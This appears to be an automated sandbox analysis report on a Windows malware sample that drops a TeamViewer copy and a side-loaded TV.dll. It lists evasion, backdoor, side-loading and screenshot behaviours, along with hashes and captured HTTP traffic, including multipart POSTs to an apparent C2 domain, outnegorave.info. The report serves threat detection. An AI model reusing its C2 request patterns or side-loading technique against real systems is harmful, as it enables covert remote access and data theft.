Windows Analysis Report 77Etc0bR2v.exe

Overview

General Information

Sample Name: 77Etc0bR2v.exe
Analysis ID: 483795
MD5: e71e3b995477081569ed357e4d403666
SHA1: 809c4cc4ae51fcf3eca24e7d7fa5c1b6b5db52ce
SHA256: 94b9abbe10bd9d6abcb8dce27814992bf7a09ed416c66998bd3496bda1490713
Tags: exeHartexLLCsignedsoldewornek
Infos:

Most interesting Screenshot:

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 17
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (window names)
Creates processes via WMI
DLL side loading technique detected
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Contains functionality to execute programs as a different user
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
EXE planting / hijacking vulnerabilities found
PE file does not import any functions
DLL planting / hijacking vulnerabilities found
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: 77Etc0bR2v.exe Virustotal: Detection: 37% Perma Link
Source: 77Etc0bR2v.exe ReversingLabs: Detection: 37%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll ReversingLabs: Detection: 26%
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.77Etc0bR2v.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen2

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_0049B32E __EH_prolog3,CryptGenRandom,__CxxThrowException@8, 3_2_0049B32E
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_0049B4A0 __EH_prolog3_catch,CryptAcquireContextA,__CxxThrowException@8, 3_2_0049B4A0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_006F605B CryptReleaseContext, 3_2_006F605B

Privilege Escalation:

barindex
EXE planting / hijacking vulnerabilities found
Source: C:\Users\user\Desktop\77Etc0bR2v.exe EXE: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Jump to behavior
DLL planting / hijacking vulnerabilities found
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: SAMCLI.DLL Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: WINMM.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: Secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: SHFolder.dll Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: VERSION.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: WININET.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: Cabinet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: MSVFW32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: CRYPTSP.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: AVICAP32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: WSOCK32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: SHFOLDER.DLL Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: WINMMBASE.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: NETUTILS.DLL Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: SRVCLI.DLL Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: CLDAPI.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: SensApi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll Jump to behavior

Compliance:

barindex
Uses 32bit PE files
Source: 77Etc0bR2v.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
EXE planting / hijacking vulnerabilities found
Source: C:\Users\user\Desktop\77Etc0bR2v.exe EXE: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Jump to behavior
DLL planting / hijacking vulnerabilities found
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: SAMCLI.DLL Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: WINMM.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: Secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: SHFolder.dll Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: VERSION.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: WININET.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: Cabinet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: MSVFW32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: CRYPTSP.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: AVICAP32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: WSOCK32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: SHFOLDER.DLL Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: WINMMBASE.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: NETUTILS.DLL Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: SRVCLI.DLL Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: CLDAPI.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: SensApi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll Jump to behavior
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 172.67.205.33:443 -> 192.168.2.6:49758 version: TLS 1.2
PE / OLE file has a valid certificate
Source: 77Etc0bR2v.exe Static PE information: certificate valid
Binary contains paths to debug symbols
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp, svchost.exe, 00000006.00000002.748672807.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.467680448.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.479287656.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.475980706.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485151608.000000006F33D000.00000002.00020000.sdmp, nso5B2F.tmp.1.dr
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00405E61 FindFirstFileA,FindClose, 1_2_00405E61
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_0040263E FindFirstFileA, 1_2_0040263E
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 1_2_0040548B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose, 2_2_6F332DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose, 2_2_6F3328B0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004BF3A9 __EH_prolog3,GetVolumeInformationW,FindFirstFileW,FindClose,FindFirstFileW,FindClose,GetVolumeInformationW, 3_2_004BF3A9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_0050331C __EH_prolog3_catch,FindFirstFileW,GetLastError,__CxxThrowException@8,FindClose, 3_2_0050331C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose, 3_2_6F332DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose, 3_2_6F3328B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose, 6_2_6F332DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose, 6_2_6F3328B0

Networking:

barindex
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 87812Content-Type: multipart/form-data; boundary=--------2771230636User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 90555Content-Type: multipart/form-data; boundary=--------2341619378User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 86397Content-Type: multipart/form-data; boundary=--------1750076427User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=32172965&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmJubm5wbGZqTJKIemBMmoKGemDwysbMaMTEcsJyYmBovmLIZshiyspkxsjGYG7Mwr5kZmZyYGJwamBuTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyepnqu0txuTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=32172965&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=32172969&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAADCARCWdP+8wfzgDovZDWc9KRaNBTKXeqgMryYWfWccXbGfDEfNT+U4KZFEiNZd0zuH/MQ/SRaQNNnjtv84KYe+U040c3/As43/r8ahQdfkk0H9Ix4o0kZbzU7V9NoH0DUbHQEDVFZHq15qjFwADH4MEpxjjsD/4at/ndBEZYFB HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=32172969&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=32172973&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAH7JHR8QgtaO7yBL7EyIXekv6NKfS/9saFdKCbGvK+cyECqaxlVV8H0eABNoQ2/lzw1z6YYl5neJbLrah282nr/4Hb+JS5aEuXRLIqpmcd0emf/P4vNdqWqM9q1bNbkmmV2Req6X7tG3LfTWPkLja/ZTELvLqPL88NLfU4qvNBdr HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=32172973&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=32172978&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=32172978&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 37.252.232.109Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /dout.aspx?s=12852408&p=10000001&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 37.252.232.109Content-Length: 3Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /dout.aspx?s=12852408&p=10000002&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 37.252.232.109Content-Length: 500000Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=12852408&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 37.252.232.109Connection: Keep-AliveCache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: svchost.exe, 0000000E.00000003.478811722.000001C495982000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000E.00000003.478811722.000001C495982000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.twitter.com (Twitter)
